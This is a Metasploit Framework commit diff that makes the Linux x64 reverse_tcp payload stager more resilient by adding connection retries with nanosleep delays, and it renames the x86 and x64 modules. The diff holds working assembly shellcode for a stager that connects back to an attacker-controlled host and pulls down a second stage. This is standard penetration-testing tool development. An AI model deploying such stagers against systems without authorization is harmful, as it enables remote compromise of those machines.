Land rapid7#8834, add resiliency to x64 linux reverse_tcp stagers

Author: Brent Cook

lib/msf/core/payload/linux/reverse_tcp.rb

@@ -14,7 +14,7 @@ module Msf
 ###
 
 
-module Payload::Linux::ReverseTcp
+module Payload::Linux::ReverseTcp_x86
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Linux

lib/msf/core/payload/linux/x64/reverse_tcp.rb

@@ -13,8 +13,7 @@ module Msf
 #
 ###
 
-
-module Payload::Linux::ReverseTcp
+module Payload::Linux::ReverseTcp_x64
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Linux
@@ -27,13 +26,12 @@ def generate
       port:        datastore['LPORT'],
       host:        datastore['LHOST'],
       retry_count: datastore['ReverseConnectRetries'],
-      reliable:    false
+      sleep_seconds: datastore['StagerRetryWait'],
     }
 
     # Generate the advanced stager if we have space
     if self.available_space && required_space <= self.available_space
       conf[:exitfunk] = datastore['EXITFUNC']
-      conf[:reliable] = true
     end
 
     generate_reverse_tcp(conf)
@@ -83,12 +81,16 @@ def required_space
   #
   def asm_reverse_tcp(opts={})
     # TODO: reliability is coming
-    retry_count  = [opts[:retry_count].to_i, 1].max
+    retry_count  = opts[:retry_count]
     reliable     = opts[:reliable]
     encoded_port = "%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
     encoded_host = "%.8x" % Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first
+    seconds = (opts[:sleep_seconds] || 5.0)
+    sleep_seconds = seconds.to_i
+    sleep_nanoseconds = (seconds % 1 * 1000000000).to_i
 
     asm = %Q^
+      mmap:
         xor    rdi, rdi
         push   0x9
         pop    rax
@@ -103,6 +105,10 @@ def asm_reverse_tcp(opts={})
         test   rax, rax
         js failed
 
+        push   #{retry_count}        ; retry counter
+        pop    r9
+
+      create_socket:
         push   rsi
         push   rax
         push   0x29
@@ -116,6 +122,7 @@ def asm_reverse_tcp(opts={})
         test   rax, rax
         js failed
 
+      connect:
         xchg   rdi, rax
         mov    rcx, 0x#{encoded_host}#{encoded_port}
         push   rcx
@@ -126,8 +133,23 @@ def asm_reverse_tcp(opts={})
         pop    rax
         syscall ; connect(3, {sa_family=AF_INET, LPORT, LHOST, 16)
         test   rax, rax
-        js     failed
+        jns    recv
+
+      handle_failure:
+        dec    r9
+        jz     failed
+        push   0x23
+        pop    rax
+        push   0x#{sleep_nanoseconds.to_s(16)}
+        push   0x#{sleep_seconds.to_s(16)}
+        mov    rdi, rsp
+        xor    rsi, rsi
+        syscall                      ; sys_nanosleep
+        test   rax, rax
+        jns    create_socket
+        jmp    failed
 
+      recv:
         pop    rcx
         pop    rsi
         pop    rdx

modules/payloads/stagers/linux/x64/reverse_tcp.rb

@@ -8,10 +8,10 @@
 
 module MetasploitModule
 
-  CachedSize = 96
+  CachedSize = 127
 
   include Msf::Payload::Stager
-  include Msf::Payload::Linux::ReverseTcp
+  include Msf::Payload::Linux::ReverseTcp_x64
 
   def initialize(info = {})
     super(merge_info(info,

modules/payloads/stagers/linux/x86/reverse_tcp.rb

@@ -11,7 +11,7 @@ module MetasploitModule
   CachedSize = 123
 
   include Msf::Payload::Stager
-  include Msf::Payload::Linux::ReverseTcp
+  include Msf::Payload::Linux::ReverseTcp_x86
 
   def initialize(info = {})
     super(merge_info(info,

modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb

@@ -11,7 +11,7 @@ module MetasploitModule
   CachedSize = 166
 
   include Msf::Payload::Stager
-  include Msf::Payload::Linux::ReverseTcp
+  include Msf::Payload::Linux::ReverseTcp_x86
 
   def self.handler_type_alias
     'reverse_tcp_uuid'